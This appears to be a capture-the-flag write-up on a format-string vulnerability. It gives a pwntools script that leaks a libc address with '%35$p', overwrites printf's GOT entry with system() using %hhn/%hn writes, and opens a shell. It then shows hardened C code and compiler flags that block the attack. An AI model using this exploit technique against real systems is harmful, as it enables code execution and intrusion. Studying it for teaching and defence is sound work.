  • Exploit analysis

    from pwn import *

    local = 1
    debug = 1

    if local:
        p = process('./pwn1')
    else:
        p = remote("127.0.0.1", 8080)

    #context.log_level = 'debug'
    '''
    if debug:
        gdb.attach(p)
    '''
    def fms(data):
        # menu option 1 reaches the printf that uses our input as the format string
        p.recvuntil("input$", timeout=4)
        p.sendline("1")
        p.recvuntil("please input your name:\n")
        p.sendline(data)


    libc = ELF("/lib/i386-linux-gnu/libc.so.6")
    elf = ELF('./pwn1')

    # leak the saved return address into __libc_start_main (stack slot 35)
    fms('%35$p')

    libc_start_main_addr = int(p.recv(10), 16) - 243    # __libc_start_main (offset 243 depends on the libc build)
    libc_addr = libc_start_main_addr - libc.symbols['__libc_start_main']    # libc base
    print("libc_addr = " + hex(libc_addr))

    printf_got = elf.got['printf']    # address of printf's GOT entry
    print("printf_got = " + hex(printf_got))

    system_addr = libc_addr + libc.symbols['system']    # address of system() in libc
    print("system_addr = " + hex(system_addr))
    # (addresses above come from pwntools' ELF module)
    #make stack
    make_stack = 'a' * 0x30 + p32(printf_got) + p32(printf_got + 0x1)
    fms(make_stack)
    #gdb.attach(p)

    payload = "%" + str(((system_addr & 0x000000FF))) + "x%18$hhn"
    payload += "%" + str(((system_addr & 0x00FFFF00) >> 8) - (system_addr & 0x000000FF)) + "x%19$hn"
    print("payload=" + payload)

    fms(payload)
    fms('/bin/sh\x00')
    p.interactive()
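The bug the script above relies on is a printf-family call whose format argument is the user's input: the `%35$p` leak and the `%hhn`/`%hn` writes only work because the "name" is interpreted as a format string. The following C example is added here and is not code from the original post or from the challenge binary (whose source is not shown); the function and variable names are my own. It shows the hardened form of such a greeting routine, where the format is a constant and the user data is passed as a `%s` argument, so directives in the input are echoed as plain text.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not the challenge binary. The vulnerable pattern behind the
 * exploit above is roughly:
 *     printf(name);                 // user input becomes the format string
 * The hardened pattern keeps the format constant:
 *     printf("hello, %s", name);    // user input is only data
 */

/* Remove the trailing newline that fgets() keeps. */
static void strip_newline(char *s)
{
    size_t n = strlen(s);
    if (n > 0 && s[n - 1] == '\n')
        s[n - 1] = '\0';
}

/* Hardened greeting: constant format, user data passed as a "%s" argument.
 * Returns snprintf's value (characters the full greeting needs, excluding the
 * NUL) or a negative value on error. The output is always NUL-terminated,
 * even when the greeting is truncated to fit outlen. */
static int greet(char *out, size_t outlen, const char *name)
{
    return snprintf(out, outlen, "hello, %s", name);
}

/* Returns 1 if s ends with suffix. Used as a self-check that the name was
 * copied byte-for-byte, i.e. no conversion directive was interpreted. */
static int ends_with(const char *s, const char *suffix)
{
    size_t ls = strlen(s), lf = strlen(suffix);
    return lf <= ls && memcmp(s + ls - lf, suffix, lf) == 0;
}

int main(void)
{
    char name[64];
    char greeting[128];

    fputs("please input your name:\n", stdout);
    if (fgets(name, sizeof name, stdin) == NULL)
        return 1;
    strip_newline(name);

    greet(greeting, sizeof greeting, name);
    puts(greeting);    /* an input such as "%35$p" is printed literally */
    return ends_with(greeting, name) ? 0 : 1;
}
```

Two compile-time settings close off the rest of the attack path used by the script: `-Wformat -Wformat-security -Werror=format-security` makes gcc and clang reject a non-literal format with no arguments, and `-Wl,-z,relro,-z,now` (full RELRO) leaves the GOT read-only at run time, so the overwrite of printf's GOT entry is no longer possible. With `-D_FORTIFY_SOURCE=2`, glibc also aborts on `%n` when the format string lives in writable memory.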
  • Original source: https://www.cnblogs.com/liuyimin/p/8029855.html